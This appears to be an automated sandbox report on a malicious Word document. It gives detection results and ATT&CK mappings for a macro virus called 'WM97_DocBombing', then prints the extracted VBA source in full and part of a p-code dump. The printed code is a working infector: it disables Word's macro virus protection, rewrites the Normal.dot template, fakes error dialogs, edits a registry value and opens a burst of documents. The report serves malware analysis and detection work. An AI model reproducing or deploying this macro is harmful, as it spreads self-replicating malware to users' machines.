MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing a VBA macro. The macro, named 'WM97_DocBombing', is designed to infect the Normal.dot template. Upon execution, it displays a fake error message to the user, likely as a distraction or to mask its malicious activity. The presence of the 'Document_Open' macro and the infection of the Normal.dot template strongly indicate a malicious intent.
Heuristics 3
-
ClamAV: Doc.Trojan.DB-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.DB-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10979 bytes |
SHA-256: 327630388c09aaf66603b53a065c526fc05e777bdcb7ece2f32d8fb7ded42f39 |
|||
|
Detection
ClamAV:
Doc.Trojan.DB-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "WM97_DocBombing"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
Private Sub Document_Open()
On Error Resume Next
Dim ToInfectNT As Boolean, ToInfectAD As Boolean
Dim Bcl As Integer, NTCL As Integer, ADCL As Integer
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NT.CodeModule.CountOfLines
ADCL = AD.CodeModule.CountOfLines
Options.SaveNormalPrompt = False
Options.VirusProtection = False
If (NT.Name) <> "WM97_DocBombing" Then
NT.CodeModule.DeleteLines 1, NTCL
ToInfectNT = True
NT.Name = "WM97_DocBombing"
End If
If (AD.Name) <> "WM97_DocBombing" Then
AD.CodeModule.DeleteLines 1, ADCL
ToInfectAD = True
AD.Name = "WM97_DocBombing"
End If
If (ToInfectNT = True And ToInfectAD = False) Then
NT.CodeModule.InsertLines 1, "Private Sub Document_Close()"
For Bcl = 2 To ADCL
NT.CodeModule.InsertLines Bcl, AD.CodeModule.Lines(Bcl, 1)
Next Bcl
NT.CodeModule.InsertLines Bcl + 1, "Public Sub ViewVBCode()"
NT.CodeModule.InsertLines Bcl + 2, "MsgBox " + """" + "This program has performed an illegal operation and will shut down." + """" + ", vbCritical, " + """" + "Microsoft Visual Basic" + """"
NT.CodeModule.InsertLines Bcl + 3, "End Sub"
NT.CodeModule.InsertLines Bcl + 4, "Public Sub ToolsMacro()"
NT.CodeModule.InsertLines Bcl + 5, "MsgBox " + """" + "This program has performed an illegal operation and will shut down." + """" + ", vbCritical, " + """" + "Microsoft Word" + """"
NT.CodeModule.InsertLines Bcl + 6, "End Sub"
End If
If (ToInfectNT = False And ToInfectAD = True) Then
AD.CodeModule.InsertLines 1, "Private Sub Document_Open()"
For Bcl = 2 To NTCL - 6
AD.CodeModule.InsertLines Bcl, NT.CodeModule.Lines(Bcl, 1)
Next Bcl
End If
If (Day(Now()) >= 6) Then
If (Month(Now()) >= 11) Then
If (Year(Now()) >= 2000) Then
ActiveDocument.Windows.Application.Caption = "WM97_DocBombing virii !!"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Vortex!!"
With ActiveDocument.Comments(1)
.Author = "WM97_DocBombing"
.Initial = "WM97_DB"
End With
For Bcl = 0 To 20
Documents.Add
Next Bcl
End If
End If
End If
'*** WM97_DocBombing Macro Virus ver1.2.03 by Vortex***
'Dedicasse au Condor (on est tous avec toi, Kevin !!!)
'Remerciements egalement a Kwyjibo pour l'excellente macro 'Melissa'
'Enjoy !!
End Sub
Public Sub ViewVBCode()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Visual Basic"
End Sub
Public Sub ToolsMacro()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
End Sub
Public Sub ViewVBCode()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Visual Basic"
End Sub
Public Sub ToolsMacro()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
End Sub
' Processing file: /opt/analyzer/scan_staging/bee9236f15524de8b38a6faeb2c486b6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/WM97_DocBombing - 6214 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' FuncDefn (Private Sub Document_Open())
' Line #2:
' OnError (Resume Next)
' Line #3:
' Dim
' VarDefn ToInfectNT (As Boolean)
' VarDefn ToInfectAD (As Boolean)
' Line #4:
' Dim
' VarDefn Bcl (As Integer)
' VarDefn NTCL (As Integer)
' VarDefn ADCL (As Integer)
' Line #5:
' Line #6:
' SetStmt
' LitDI2 0x0001
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.